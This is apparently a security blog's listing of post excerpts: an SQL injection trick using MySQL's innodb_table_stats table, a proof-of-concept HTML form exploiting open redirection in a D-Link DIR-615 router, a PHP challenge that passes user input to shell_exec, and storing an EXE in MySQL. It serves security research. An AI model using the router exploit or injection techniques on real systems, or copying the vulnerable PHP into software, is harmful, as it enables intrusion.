Alternative for Information_Schema.Tables in MySQL

Overview

Starting from MySQL 5.5 and above the default storage engine was known as the InnoDB. In MySQL versions 5.5 and above if you do a “select @@innodb_version” you can see the version of the InnoDB, which is almost same as your MySQL version.
innodb-version

But in MySQL 5.6 and above I noticed 2 new tables by InnoDB. “innodb_index_stats” and “innodb_table_stats”. Both these tables contains the database and table names of all the newly created databases and tables.
The MySQL documentation explains these two tables as follows.

The persistent statistics feature relies on the internally managed tables in the mysql database, named innodb_table_stats and innodb_index_stats. These tables are set up automatically in all install, upgrade, and build-from-source procedures.

For injection purposes let’s take the “innodb_table_stats” table. Unfortunately InnoDB doesn’t store columns.

If you simply do “show tables in mysql” you can view this from your localhost.
(more…)

Advertisements

D-Link DIR-615 Open Redirection and XSS

D-Link DIR-615
Hardware Version: E3
Firmware Version: 5.10

The ‘apply.cgi’ file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in ‘apply.cgi’. For example the ‘ping_response.cgi’ file.

Open Redirection

apply.cgi

<html>
<!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="https://google.lk" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
    <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>

(more…)

PHP Feature or 0day?

Today one of my friends @RakeshMane10 gave me a challenge which I found pretty interesting.

<?php
ini_set('error_displays', 0);
 $ip = htmlspecialchars($_GET['url'], ENT_QUOTES);
 $f = fsockopen($ip, 80, $errno, $errstr, 5);
 if($f) {
 	$result = shell_exec('ping -c 1 ' . $ip);
 	echo '<div class="alert alert-success">' . nl2br($result) . '</div>';
} else {
 	echo '<div class="alert alert-danger">' .$errstr . '</div>';
 }
?>

(more…)

Storing a EXE inside MySQL

It’s possible to store a EXE file inside a MySQL database. You can try this out. For demonstration purposes I’m running MySQL in my localhost. I will be creating a simple database and a table big enough to store the exe file. Since we convert the exe to a hex file the content would be larger than the original exe file. I will be using ‘putty.exe’ as the binary.

CREATE DATABASE testupload;

USE testupload

CREATE TABLE uploads (
 id INT(3) NOT NULL AUTO_INCREMENT,
 name VARCHAR(1000000) NOT NULL,
 PRIMARY KEY (id)
 );

(more…)